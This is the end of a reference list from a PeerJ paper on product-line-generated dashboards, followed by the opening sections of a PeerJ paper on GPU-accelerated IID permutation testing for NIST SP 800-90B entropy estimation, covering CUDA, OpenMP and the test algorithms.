Valéncia. Facebook. 2016. GraphQL. Available at https://facebook.github.io/graphql/ (accessed on 24 July 2017). Fallside DC, Walmsley P. 2004. XML Schema part 0: Primer second version. Cambridge: W3C. Few S. 2006. Information dashboard design. Sebastopol: O’Reilly Media. Freeman G, Batory D, Lavender G. 2008. Lifting transformational models of product lines: a case study. In: International conference on theory and practice of model trans- formations. Berlin, Heidelberg: Springer, 16–30 DOI 10.1007/978-3-540-69927-9_2. Gabillon Y, Biri N, Otjacques B. 2015. Designing an adaptive user interface according to software product line engineering. In: The eighth international conference on advances in computer-human interactions. Lisbon, Portugal, 86–91. Gacek C, Anastasopoules M. 2001. Implementing product line variabilities. In: ACM SIGSOFT software engineering notes. New York: ACM, 109–117. García-Peñalvo FJ. 2016. The third mission. In: Education in the knowledge society. Vol. 17. Salamanca: Universidad de Salamanca, 7–18. García-Peñalvo FJ, Cruz-Benito J, Martín-González M, Vázquez-Ingelmo A, Sánchez- Prieto JC, Therón R. 2018. Proposing a machine learning approach to analyze and predict employment and its factors. International Journal of Interactive Multimedia and Artificial Intelligence 5(2):39–45 DOI 10.9781/ijimai.2018.02.002. Gomaa H. 2004. Designing software product lines with UML: from use cases to pattern- based software architectures. Boston: Addison Wesley Longman Publishing Co., Inc. Gómez A, Penadés MC, Canós JH, Borges MR, Llavador M. 2014. A framework for variable content document generation with multiple actors. Information and Software Technology 56:1101–1121 DOI 10.1016/j.infsof.2013.12.006. Gotz D, Wen Z. 2009. Behavior-driven visualization recommendation. In: Proceedings of the 14th international conference on intelligent user interfaces. New York: ACM, 315–324. Hall MA. 1999. Correlation-based feature selection for machine learning. PhD thesis, University of Waikato, Hamilton, New Zealand. Hauptmann B, Bauer B, Harhurin A, Pleuss A. 2010. Supporting derivation and customization of user interfaces in software product lines using the example of web applications. Master’s thesis, Technische Universität München. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 26/29 https://peerj.com http://dx.doi.org/10.1109/ACCESS.2017.2782678 http://dx.doi.org/10.18420/se2019-53 http://dx.doi.org/10.1007/978-3-642-23768-3_23 https://facebook.github.io/graphql/ http://dx.doi.org/10.1007/978-3-540-69927-9_2 http://dx.doi.org/10.9781/ijimai.2018.02.002 http://dx.doi.org/10.1016/j.infsof.2013.12.006 http://dx.doi.org/10.7717/peerj-cs.203 Hillage J, Pollard E. 1998. Employability: developing a framework for policy analysis. London: DfEE London. Jarzabek S, Bassett P, Zhang H, Zhang W. 2003. XVCL: XML-based variant config- uration language. In: Proceedings of the 25th international conference on software engineering. Washington, D.C.: IEEE Computer Society, 810–811. Kakas AC. 2017. A/B Testing. In: Sammut C, Webb GI, eds. Encyclopedia of machine learning and data mining. New York: Springer. Kang KC, Cohen SG, Hess JA, Novak WE, Peterson AS. 1990. Feature-oriented domain analysis (FODA) feasibility study. Pittsburgh: Carnegie-Mellon University, Software Engineering Institute. Kästner C, Apel S. 2008. Integrating compositional and annotative approaches for product line engineering. In: Proc GPCE workshop on modularization, composition and generative techniques for product line engineering. 35–40. Kästner C, Apel S, Kuhlemann M. 2008. Granularity in software product lines. In: Proceedings of the 30th international conference on software engineering. New York: ACM, 311–320. Kleppe AG, Warmer J, Bast W. 2003. MDA explained. The model driven architecture: practice and promise. Boston: Addison-Wesley Longman Publishing Co. Inc. Kramer D, Oussena S, Komisarczuk P, Clark T. 2013. Using document-oriented GUIs in dynamic software product lines. In: ACM SIGPLAN Notices. New York: ACM, 85–94. Logre I, Mosser S, Collet P, Riveill M. 2014. Sensor data visualisation: a composition- based approach to support domain variability. In: European conference on modelling foundations and applications. Berlin, Heidelberg: Springer, 110–116. Marcus A, Gould EW. 2000. Crosscurrents: cultural dimensions and global Web user- interface design. Interactions 7:32–46 DOI 10.1145/345190.345238. Marinho FG, Lima F, Ferreira Filho JB, Rocha L, Maia ME, De Aguiar SB, Dantas VL, Viana W, Andrade RM, Teixeira E. 2010. A software product line for the mobile and context-aware applications domain. In: International conference on software product lines. Berlin, Heidelberg: Springer, 346–360. Michavila F, Martínez JM, Martín-González M, García-Peñalvo FJ, Cruz-Benito J. 2016. Barómetro de empleabilidad y empleo de los universitarios en España, 2015 (Primer informe de resultados). Madrid: Observatorio de Empleabilidad y Empleo Universitarios. Michavila F, Martínez JM, Martín-González M, García-Peñalvo FJ, Cruz Benito J. 2018a. Empleabilidad de los titulados universitarios en España. Proyecto OEEU. Education in the Knowledge Society 19:21–39 DOI 10.14201/eks20181912139. Michavila F, Martínez JM, Martín-González M, García-Peñalvo FJ, Cruz-Benito J, Vázquez-Ingelmo A. 2018b. Barómetro de empleabilidad y empleo universitarios. Edición Máster 2017. Madrid, España: Observatorio de Empleabilidad y Empleo Universitarios. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 27/29 https://peerj.com http://dx.doi.org/10.1145/345190.345238 http://dx.doi.org/10.14201/eks20181912139 http://dx.doi.org/10.7717/peerj-cs.203 Nascimento LMD. 2008. Cores assets development in software product lines-towards a practical approach for the mobile game domain. Riga, Latvia: Lambert Academic Publishing. Pleuss A, Botterweck G, Dhungana D. 2010. Integrating automated product derivation and individual user interface design. In: Fourth international workshop on variability modelling of software-intensive systems. Linz, Austria. Pleuss A, Hauptmann B, Dhungana D, Botterweck G. 2012a. User interface engineering for software product lines: the dilemma between automation and usability. In: Proceedings of the 4th ACM SIGCHI symposium on Engineering interactive computing systems. New York: ACM, 25–34. Pleuss A, Hauptmann B, Keunecke M, Botterweck G. 2012b. A case study on variability in user interfaces. In: Proceedings of the 16th international software product line conference-vol. 1. New York: ACM, 6–10. Pohl K, Böckle G, Van der Linden FJ. 2005. Software product line engineering: founda- tions, principles and techniques. New York: Springer-Verlag New York, Inc. Quinton C, Mosser S, Parra C, Duchien L. 2011. Using multiple feature models to design applications for mobile phones. In: Proceedings of the 15th international software product line conference, vol. 2. New York: ACM, 23. Ridge B, Gaspar T, Ude A. 2017. Rapid state machine assembly for modular robot control using meta-scripting, templating and code generation. In: Humanoid Robotics (Humanoids), 2017 IEEE-RAS 17th International Conference. Piscataway: IEEE, 661–668. Ronacher A. 2008. Jinja2 Documentation. Available at http://jinja.pocoo.org/docs/2.10/: Jinja2. Sarikaya A, Correll M, Bartram L, Tory M, Fisher D. 2018. What do we talk about when we talk about dashboards? IEEE Transactions on Visualization Computer Graphics 25:682–692. Sboui T, Ayed MB, Alimi AM. 2018. A UI-DSPL approach for the development of context-adaptable user interfaces. IEEE Access 6:7066–7081 DOI 10.1109/ACCESS.2017.2782880. Siroker D, Koomen P. 2013. A/B testing: the most powerful way to turn clicks into customers. Hoboken: John Wiley & Sons. Tufte E, Graves-Morris P. 2014. The visual display of quantitative information.; 1983. Cheshire: Graphics Press. Universities UK, Confederation of British Industry. 2009. Future fit: preparing graduates for the world of work. London: CBI, Universities UK. Vartak M, Huang S, Siddiqui T, Madden S, Parameswaran A. 2017. Towards visualiza- tion recommendation systems. ACM SIGMOD Record 45:34–39. Vázquez-Ingelmo A. 2018. Code repository that supports the research presented in the paper Taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. Available at https://github.com/AndVazquez/dashboard-spl-assets. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 28/29 https://peerj.com http://jinja.pocoo.org/docs/2.10/:Jinja2 http://jinja.pocoo.org/docs/2.10/:Jinja2 http://dx.doi.org/10.1109/ACCESS.2017.2782880 https://github.com/AndVazquez/dashboard-spl-assets http://dx.doi.org/10.7717/peerj-cs.203 Vázquez-Ingelmo A, Cruz-Benito J, García-Peñalvo FJ. 2017. Improving the OEEU’s data-driven technological ecosystem’s interoperability with GraphQL. In: Dodero JM, Ibarra Sáiz MS, Ruiz Rube I, eds. Fifth international conference on technological ecosystems for enhancing multiculturality (TEEM’17) (Cádiz, Spain, October 18–20 (2017). New York: ACM. Vázquez-Ingelmo A, García-Peñalvo FJ, Therón R. 2018a. Application of domain engineering to generate customized information dashboards. In: HCI International 2018 20th conference on human-computer interaction (15-20 2018). Las Vegas: Springer. Vázquez-Ingelmo A, García-Peñalvo FJ, Therón R. 2018b. Domain engineering for generating dashboards to analyze employment and employability in the academic context. In: 6th international conference on technological ecosystems for enhancing multiculturality. Salamanca, Spain. New York: ACM DOI 10.1145/3284179.3284329. Vázquez-Ingelmo A, García-Peñalvo FJ, Therón R. 2018c. Generation of customized dashboards through software product line paradigms to analyse university employ- ment and employability data. In: Learning analytics summer institute Spain 2018— LASI-SPAIN 2018. León, Spain. Voelter M, Visser E. 2011. Product line engineering using domain-specific languages. In: Software Product Line Conference (SPLC), 2011 15th International. Piscataway: IEEE, 70–79. Voigt M, Pietschmann S, Grammel L, Meißner K. 2012. Context-aware recommen- dation of visualization components. In: The fourth international conference on information, process, and knowledge management (eKNOW). Citeseer, 101–109. Yorke M. 2006. Employability in higher education: what it is-what it is not. Heslington, York: Higher Education Academy York. Zhang H, Jarzabek S, Swe SM. 2001. XVCL approach to separating concerns in product family assets. In: International symposium on generative and component-based software engineering. Efurt, Germany: Springer, 36–47. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 29/29 https://peerj.com http://dx.doi.org/10.1145/3284179.3284329 http://dx.doi.org/10.7717/peerj-cs.203 work_n6tm7logj5axzews3emhc2ok6i ---- Submitted 2 June 2020 Accepted 30 January 2021 Published 8 March 2021 Corresponding author Yewon Kim, fdt150@kookmin.ac.kr Academic editor Gang Mei Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.404 Copyright 2021 Kim and Yeom Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Accelerated implementation for testing IID assumption of NIST SP 800-90B using GPU Yewon Kim1 and Yongjin Yeom1,2 1 Department of Financial Information Security, Kookmin University, Seoul, South Korea 2 Department of Information Security, Cryptology, and Mathematics, Kookmin University, Seoul, South Korea ABSTRACT In cryptosystems and cryptographic modules, insufficient entropy of the noise sources that serve as the input into random number generator (RNG) may cause serious damage, such as compromising private keys. Therefore, it is necessary to estimate the entropy of the noise source as precisely as possible. The National Institute of Standards and Technology (NIST) published a standard document known as Special Publication (SP) 800-90B, which describes the method for estimating the entropy of the noise source that is the input into an RNG. The NIST offers two programs for running the entropy estimation process of SP 800-90B, which are written in Python and C++. The running time for estimating the entropy is more than one hour for each noise source. An RNG tends to use several noise sources in each operating system supported, and the noise sources are affected by the environment. Therefore, the NIST program should be run several times to analyze the security of RNG. The NIST estimation runtimes are a burden for developers as well as evaluators working for the Cryptographic Module Validation Program. In this study, we propose a GPU-based parallel implementation of the most time-consuming part of the entropy estimation, namely the independent and identically distributed (IID) assumption testing process. To achieve maximal GPU performance, we propose a scalable method that adjusts the optimal size of the global memory allocations depending on GPU capability and balances the workload between streaming multiprocessors. Our GPU-based implementation excluded one statistical test, which is not suitable for GPU implementation. We propose a hybrid CPU/GPU implementation that consists of our GPU-based program and the excluded statistical test that runs using OpenMP. The experimental results demonstrate that our method is about 3 to 25 times faster than that of the NIST package. Subjects Cryptography, Distributed and Parallel Computing, Security and Privacy Keywords Parallel processing, GPU computing, Entropy estimator, NIST SP 800-90B, Random Number Generator INTRODUCTION A random number generator (RNG) generates random numbers required to construct the cryptographic keys, nonce, salt, and sensitive security parameters used in cryptosystems and cryptographic modules. In general, an RNG produces random numbers (output) via a deterministic algorithm, depending on the noise sources (input). If its input is affected by the low entropy of the noise sources, the output may be compromised. It is easy to How to cite this article Kim Y, Yeom Y. 2021. Accelerated implementation for testing IID assumption of NIST SP 800-90B using GPU. PeerJ Comput. Sci. 7:e404 http://doi.org/10.7717/peerj-cs.404 https://peerj.com/computer-science mailto:fdt150@kookmin.ac.kr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.404 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.404 find examples that show the importance of entropy in operating systems. Heninger et al. (2012) describes the RSA/DSA private keys for some TLS/SSH hosts may be obtained due to insufficient entropy of Linux pseudo-random number generator (PRNG) during the key generation process. Ding et al. (2014) investigated the amount of the entropy of Linux PRNG running on Android in boot-time. Kaplan et al. (2014) demonstrated an IPv6 denial of service attack and a stack canary bypass with the weaknesses of insufficient entropy in boot-time of Android. Kim, Han & Lee (2013) presented a technique to recover PreMasterSecret (PMS) of the first SSL session in Android by 258 complexity since PMS is generated from insufficient entropy of OpenSSL PRNG at boot-time. Ristenpart & Yilek (2010), Bernstein et al. (2013), Michaelis, Meyer & Schwenk (2013), Schneier et al. (2015), and Yoo, Kang & Yeom (2017) describe the attacks caused by weakness of entropy collectors or incorrect estimations of the entropy that are exaggerated or too conservative. Insufficient entropy of the noise source that is the input into the RNG may cause serious damage in cryptosystems and cryptographic modules. Thus, it is necessary to estimate the entropy of the noise source as precisely as possible. The United States National Institute of Standards and Technology (NIST) Special Publication (SP) 800-90B (Barker & Kelsey, 2012; Sönmez Turan et al., 2016; Sönmez Turan et al., 2018) is a standard document for estimating the entropy of the noise source. The general flow of the entropy estimation process in SP 800-90B (Sönmez Turan et al., 2018) is to determine the track, estimate the entropy according to the track, and then apply the restart test, as summarized in Fig. 1. In this paper, determining the track is referred to as an independent and identically distributed (IID) test. There are two different tracks: an IID track and a non-IID track. If it is determined as the IID track, it is assumed that the samples of the noise source are IID; otherwise, the samples are non-IID. The estimator depending on IID or non-IID track estimates the entropy of the noise source. The restart test evaluates the estimated entropy using different outputs from many restarts of the noise source to check the overestimate. This document is currently used in the Cryptographic Module Validation Program (CMVP) and has been cited as a recommendation for entropy estimation in an ISO standard document ISO/IEC-20543 (2019) for test and analysis methods of RNGs. The principles of entropy estimators in SP 800-90B have been investigated and analyzed theoretically (Kang, Park & Yeom, 2017; Zhu et al., 2017; Zhu et al., 2019). However, it is difficult to find research on the efficient implementation of the entropy estimation process of SP 800-90B. NIST provides two programs (NIST, 2015) on GitHub for the entropy estimation process of SP 800-90B. The first program is for the entropy estimation process of the second draft of SP 800-90B (Sönmez Turan et al., 2016), written in Python. The second program is for the entropy estimation process of the final version of SP 800-90B (Sönmez Turan et al., 2018), written in C++. Table 1 displays the execution times of two single-threaded NIST programs on the central processing unit (CPU). The noise source used as input is GetTickCount, with a sample size of 8 bits. GetTickCount can be collected through the GetTickCount() function in the Windows environment. Since GetTickCount is determined as the non-IID by the IID test, the process of the IID-track estimation entropy does not run. The entropy estimation process of the IID track takes approximately one second for both NIST programs Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 2/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Figure 1 Flow of the entropy estimation process of SP 800-90B. Full-size DOI: 10.7717/peerjcs.404/fig-1 Table 1 Execution time of each single-threaded NIST program for the entropy estimation process (noise source: GetTickCount; noise sample size: 8 bits). NIST program written in Python NIST program written in C++ IID test 17 h 1 h 10 min [IID track] Estimation entropy − − [Non-IID track] Estimation entropy 15 min 20 s Restart tests 2 s 2 min Total execution time 17 h 16 min 1 h 13 min if it is forcibly operated. In Table 1, the IID test consumes the majority of the total execution time in both programs. Developers of cryptosystems or cryptographic modules should estimate the entropy of the noise sources to analyze the security of the RNG. Since the entropy estimation process of SP 800-90B is representative, and modules for the CMVP shall be tested for compliance with SP 800-90B (NIST & CSE, 2020), most developers use the method of SP 800-90B. Furthermore, since CMVP Implementation Guidance (IG) gives the link of the NIST programs (NIST & CSE, 2020), most developers use the NIST programs to reduce the time required for implementation. As recommended by the CMVP, the RNG should use at least one noise source. Since the NIST program estimates the entropy for one noise source, Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 3/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-1 http://dx.doi.org/10.7717/peerj-cs.404 the developer should run the NIST program k times when the RNG uses k noise sources. Since the noise sources are different for each operating system, the developer should run the program k×s times if the developer’s cryptosystem or cryptographic module supports s operating systems. The distribution of the noise source may be changed due to mechanical or environmental changes or to the timing variations in human behavior (NIST & CSE, 2020). The physical noise source is based on a dedicated physical process (ISO/IEC-20543, 2019); it may be affected by the environment of the device in which the RNG operates. Therefore, to claim that the noise source has an identical distribution in any environment, the developer should perform the IID test and entropy estimation in several environments or devices. If the developer performs analysis on d devices, the developer should run the program k×s×d times. If k=10, s=2, and d =5, the developer should run the NIST program 100 times. According to Table 1, the NIST program written in C++ requires approximately 1 h to estimate the entropy of one noise source. If the developer cannot run multiple NIST programs simultaneously, it takes about 100 hours or approximately four days. Moreover, to find k noise sources that can be used as inputs of the RNG in the environment, the developer should perform entropy estimation for k or more collectible noise sources. Therefore, it may take more than 100 hours. The developer of the cryptographic module for the CMVP should perform similar work for re-examination or new examination every specific period since the module will be placed on the CMVP active list for five years. The evaluator running checks based on the documentation submitted by the developer for the CMVP may run the NIST program multiple times as well. As this runtime may be burdensome for developers, it can be tempting to use an RNG without security analysis. Thus, if the developer’s RNG is vulnerable, this vulnerability is likely to affect the overall security of the cryptosystem or cryptographic module. Graphics processing units (GPUs) are excellent candidates to accelerate the process of SP 800-90B, especially the IID test. GPUs were initially designed for accelerating computer graphics and image processing, but they have become more flexible, allowing them to be used for general computations in recent years. The use of GPUs for performing computations handled by CPUs is known as general-purpose computing on GPUs (GPGPUs). New parallel computing platforms and programming models, such as the computing unified device architecture (CUDA) released by NVIDIA, enable software developers to leverage GPGPUs for various applications. GPGPUs are used in cryptography as well as areas including signal processing and artificial intelligence. Numerous studies have been conducted on the parallel implementations of cryptographic algorithms such as AES, ECC, and RSA (Neves & Araujo, 2011; Li et al., 2012; Pan et al., 2016; Ma et al., 2017; Li et al., 2019) and on the acceleration of cryptanalysis, including hash collision attacks using GPUs (Stevens et al., 2017). To process the entire IID test in parallel using GPU, approximately 9 GB or more of the global memory of the GPU are required. Since the compression test used in the IID test requires a different technique of implementation from the other statistical tests, a CUDA version of the compression test is needed to implement the IID test in parallel. However, bzip2 used in the compression test is not actively under development as a CUDA version since it is unsuitable for GPU implementation. Therefore, we propose a GPU-based parallel Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 4/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 implementation of the IID test without the compression test using multiple optimization techniques. The adaptive size of the global memory used in the kernel function can be set so that maximal performance improvement can be obtained from the GPU specification in use. Moreover, we propose a hybrid CPU/GPU implementation of the IID test that includes the compression test. Our GPU-based implementation is approximately 12 times faster than the multi-threaded NIST program without the compression test when determining the noise source as the IID. It is approximately 25 times faster when determining the noise source as the non-IID. Our hybrid CPU/GPU implementation is 3 and 25 times, respectively, faster than the multi-threaded NIST program with the compression test when determining the noise source as the IID and the non-IID, respectively. Most noise sources are non-IID (Kelsey, 2012). The non-IID noise sources are disk timings, interrupt timings, jitter (Müller, 2020), GetTickCount, and so on. Since the proposed hybrid CPU/GPU implementation has better performance for the non-IID noise sources, we expect it to be highly practical. The remainder of this paper is organized as follows. ‘Preliminaries’ introduces the CUDA GPU programming model, the OpenMP programming model, and the IID test of SP 800- 90B. ‘Proposed Implementations’ outlines our GPU-based parallel implementation of the IID test and the hybrid CPU/GPU implementation of the IID test. In ‘Experiments and performance evaluation’, the experimental results on the optimization and performance of our methods are presented and analyzed. Finally, ‘Conclusions’ summarizes and concludes the paper. PRELIMINARIES CUDA programming model NVIDIA CUDA (NVIDIA, 2020b) is the most widely used programming model for GPUs. CUDA uses the single instruction multiple thread (SIMT) model. A kernel is a function that performs the same instruction on the GPU in parallel. A thread is the smallest unit operating the instructions of the kernel function. Multiple threads are grouped into a CUDA block, and multiple blocks are grouped into a grid. A CUDA-capable GPU contains numerous CUDA cores, which are fundamental computing units and execute the threads. CUDA cores are collected into groups called streaming multiprocessors (SMs). A kernel is launched from the host (CPU) to run on GPU and generate a collection of threads organized into blocks. Each CUDA block is assigned to one of the SMs on the GPU and executes independently on GPU. The mapping between blocks and SMs is done by a CUDA scheduler (Vaidya, 2018). An SM can concurrently execute the smaller group of threads, which is called a warp. All threads in a warp execute the same instruction, and there are 32 threads in a warp on most CUDA-capable GPUs. Latency can occur, such as data required for computation have not yet been fetched from global memory that the access is slow. To hide the latency, an SM can execute context-switching, which transfers control to another warp while waiting for the results. The memory of CUDA-capable GPU includes global memory, local memory, shared memory, register, constant memory, and texture memory. Table 2 shows the memory Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 5/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Table 2 Memory of CUDA-capable GPU (NVIDIA, 2020a). Memory Location on/off chip Access Scope Lifetime Register On R /W 1 thread Thread Local Off R /W 1 thread Thread Shared On R /W All threads in block Block Global Off R /W All threads +host Host allocation Constant Off R All threads +host Host allocation Texture Off R All threads +host Host allocation types listed from top to bottom by access speed from fast to slow, and their principal characteristics. A basic frame of the program using the CUDA programming model is as follows: allocate memory in the device (GPU) and transfer data from the host to the device (if necessary); launch the kernel; transfer data from the device to the host (if required). OpenMP programming model Open Multi-Processing (OpenMP) (OpenMP, 2018) is an application programming interface (API) for parallel programming on the shared memory multiprocessors. It extends C, C++, and FORTRAN on many platforms, instruction-set architectures, and operating systems, including Linux and Windows with a set of compiler directives, library routines, and environment variables. OpenMP facilitates the parallelization of the sequential program. The programmer adds parallelization directives to loops or statements in the program. OpenMP uses the fork-join parallelism (OpenMP, 2018). OpenMP program begins as a single thread of execution, called an initial thread. When the initial thread encounters a parallel construct, the thread spawns a team of itself and zero or more additional threads as needed and becomes the master of the new team. The statements and functions in the parallel region are executed in parallel by each thread in the team. All threads replicate the execution of the same code unless a work-sharing directive (such as for dividing the computation among threads) is specified within the parallel region. Variables default to shared among all threads in parallel region. Terms A sample is data obtained from one output of the (digitized) noise source and the sample size is the size of the (noise) sample in bits. For example, we collect a sample of the noise source GetTickCount in Windows by calling the GetTickCount() function once. In this case, the sample size is 32 bits. However, as certain estimators of SP 800-90B do not support samples larger than 8 bits, it is necessary to reduce the sample size. GetTickCount is the elapsed time (in milliseconds) since the system was started. Thus, it is thus easy to conclude that the low-order bits in the sample of GetTickCount contain most of the variability. Therefore, it would be reasonable to reduce the 32-bit sample to an 8-bit sample by using the lowest 8 bits. The entropy estimation of SP 800-90B is performed on input Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 6/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 data consisting of one million samples, where each sample size is 8 bits. Furthermore, the maximum of the min-entropy per sample is 8. IID test for entropy estimation The IID test of SP 800-90B consists of permutation testing and five additional chi-square tests. Permutation testing identifies evidence against the null hypothesis that the noise source is IID. Since the permutation testing is the most time-consuming step in the entire IID test, we only focus on the permutation testing in this study. Algorithm 1 Permutation testing (Sönmez Turan et al., 2018). Require: S=(s1,...,sL), where si is the noise sample and L=1,000,000. Ensure: Decision on the IID assumption. 1: for statistical test i do 2: Assign the counters Ci,0 and Ci,1 to zero. 3: Calculate the test statistic TESTINi on S. 4: end for 5: for j=1 to 10,000 do 6: Permute S using the Fisher–Yates shuffle algorithm. 7: Calculate the test statistic TESTShufflei on the shuffled data. 8: if (TESTShufflei > TEST IN i ) then 9: Increment Ci,0. 10: else if (TESTShufflei =TEST IN i ) then 11: Increment Ci,1. 12: end if 13: end for 14: if ((Ci,0+Ci,1≤5)or(Ci,0≥9,995)) for any i then 15: Reject the IID assumption. 16: else 17: Assume that the noise source outputs are IID. 18: end if Algorithm 1 presents the algorithm of the permutation testing described in SP 800-90B. The permutation testing first performs statistical tests on one million samples of the noise source, namely the original data. We refer to the results of the statistical tests as the original test statistics. Thereafter, permutation testing carries out 10,000 iterations, as follows: In each iteration, the original data are shuffled, the statistical tests are performed on the shuffled data, and the results are compared with the original test statistics. After 10,000 iterations, the ranking of the original test statistics among the shuffled test statistics is computed. If the rank belongs to the top 0.05% or bottom 0.05%, the permutation testing determines that the original data (input) are not IID. That is, it concludes that the original data are not IID if Eq. (1) is satisfied for any i that is the index of the statistical test. For any i, the counter Ci,0 is the number of j in step 5 of alg:alg1 satisfying the shuffled test statistic TESTShufflei > the original test statistic TEST IN i . The counter Ci,1 is the number of Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 7/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Algorithm 2 Permutation testing of NIST program written in C++. Require: S=(s1,...,sL), where si is the noise sample and L=1,000,000. Ensure: Decision on the IID assumption. 1: for statistical test i do 2: Assign the counters Ci,0 and Ci,1 to zero. 3: Calculate the test statistic TESTINi on S. 4: end for 5: for j=1 to 10,000 do 6: Permute S using the Fisher–Yates shuffle algorithm. 7: for statistical test i do 8: if statusi= true then 9: Calculate the test statistic TESTShufflei on the shuffled data. 10: if (TESTShufflei > TEST IN i ) then 11: Increment Ci,0. 12: else if (TESTShufflei =TEST IN i ) then 13: Increment Ci,1. 14: else 15: Increment Ci,2. 16: end if 17: if ((Ci,0+Ci,1 > 5)and(Ci,1+Ci,2 > 5)) then 18: statei= false. 19: end if 20: end if 21: end for 22: end for 23: if ((Ci,0+Ci,1≤5)or(Ci,0≥9,995)) for any i then 24: Reject the IID assumption. 25: else 26: Assume that the noise source outputs are IID. 27: end if Algorithm 3 Fisher–Yates shuffle (Sönmez Turan et al., 2018). Require: S=(s1,...,sL), where si is the noise sample and L=1,000,000. Ensure: Shuffled S=(s1,...,sL). 1: for i from L downto 1 do 2: Generate a random integer j such that 1≤ j≤ i. 3: Swap sj and si. 4: end for Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 8/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 j satisfying TESTShufflei =TEST IN i , whereas the counter Ci,2 is the number of j satisfying TESTShufflei < TEST IN i .( Ci,0+Ci,1≤5 ) or ( Ci,0≥9,995 ) (1) Equivalently, the permutation testing determines that the original data are IID if Eq. (2) is satisfied for all i that is the index of the statistical test.( Ci,0+Ci,1 > 5 ) and ( Ci,1+Ci,2 > 5 ) (2) The NIST optimized the permutation testing of the NIST program written in C++ using Eq. (2). Thus, even if each statistical test is not performed 10,000 times completely, the permutation testing can determine that the input data are IID. Algorithm 2 is the improved version of the permutation testing optimized by the NIST. We briefly introduce the shuffle algorithm and the tests used in the permutation testing. The shuffle algorithm is the Fisher–Yates shuffle algorithm presented in Algorithm 3. The permutation testing uses 11 statistical tests, the names of which are as follows: • Excursion test • Number of directional runs • Length of directional runs • Number of increases and decreases • Number of runs based on the median • Length of runs based on the median • Average collision test statistic • Maximum collision test statistic • Periodicity test • Covariance test • Compression test* The aim of the periodicity test is to measure the number of periodic structures in the input data. The aim of the covariance test is to measure the strength of the lagged correlation. Thus, the periodicity and covariance tests take a lag parameter as input and each test is repeated for five different values of the lag parameter: 1, 2, 8, 16, and 32 (Sönmez Turan et al., 2018). Therefore, a total of 19 statistical tests are used in the permutation testing. If the input data are binary (that is, the sample size is 1 bit), one of two conversions is applied to the input data for some of the statistical tests. The descriptions of each conversion and the names of the statistical tests using that conversion are as follows (Sönmez Turan et al., 2018): Conversion I Conversion I divides the input data into 8-bit non-overlapping blocks and counts the number of 1s in each block. If the size of the final block is less than 8 bits, zeroes are appended. The numbers and lengths of directional runs, numbers of increases and decreases, periodicity test, and covariance test apply Conversion I to the input data. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 9/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Conversion II Conversion II divides the input data into 8-bit non-overlapping blocks and calculates the integer value of each block. If the size of the final block is less than 8 bits, zeroes are appended. The average collision test statistic and maximum collision test statistic apply Conversion II to the input data. For example, let the binary input data be (0,1,1,0,0,1,1,0,1,0,1,1). For Conversion I, the first 8-bit block includes four 1s and the final block, which is not complete, includes three 1s. Thus, the output data of Conversion I are (4,3). For Conversion II, the integer value of first block is 102 and the final block becomes (1,0,1,1,0,0,0,0) with an integer value of 88. Thus, the output of Conversion II is (102,88). PROPOSED IMPLEMENTATIONS Target of GPU-based parallel processing Steps 5 to 22 of Algorithm 2, with 10,000 iterations, consume most of the processing time of the permutation testing. The shuffle algorithm and 19 statistical tests are performed on the data with one million samples of the noise source in each iteration. Hence, it is natural to consider the GPU-based parallel implementation of 10,000 iterations, which are processed sequentially in the permutation testing. The implementation of the compression test* differs from those of the other statistical tests used in the permutation testing. The compression test* uses bzip2 (Seward, 2019), which compresses the input data using the Burrows–Wheeler transform (BWT), the move-to-front (MTF) transform, and Huffman coding. There have been studies on the parallel implementation of bzip2 using the GPU. In Patel et al. (2012), all three main steps, namely the BWT, the MTF transform, and Huffman coding, were implemented in parallel using the GPU. However, the performance was 2.78 times slower than that of the CPU implementation. In Shastry et al. (2016), only the BWT was computed on the GPU and a performance improvement of 1.4 times that of the standard CPU-based algorithm was achieved. However, we couldn’t apply this approach, because our parallel test should be implemented on the GPU together with other statistical tests. Moreover, the compression test does not play a key role in Algorithm 2. That is, it is infrequent for a noise source to be determined as the non-IID only by the compression test results among the 19 statistical tests used in the permutation testing. Therefore, we design the GPU-based parallel implementation of the permutation testing consisting of the shuffle algorithm and 18 statistical tests, without the compression algorithm. Moreover, we design the hybrid CPU/GPU implementation of the permutation testing consisting of our GPU-based parallel implementation and a maximum of 10,000 compression tests using OpenMP. Overview of GPU-based parallel permutation testing Approximately 9.3 GB (= 10,000 × one million bytes of data) of the global memory of the GPU is required for the CPU to invoke a CUDA kernel to process 10,000 iterations of the permutation testing in parallel on the GPU. Some GPUs do not have more than 9 GB of global memory. Therefore, we propose the GPU-based parallel implementation of the Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 10/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Figure 2 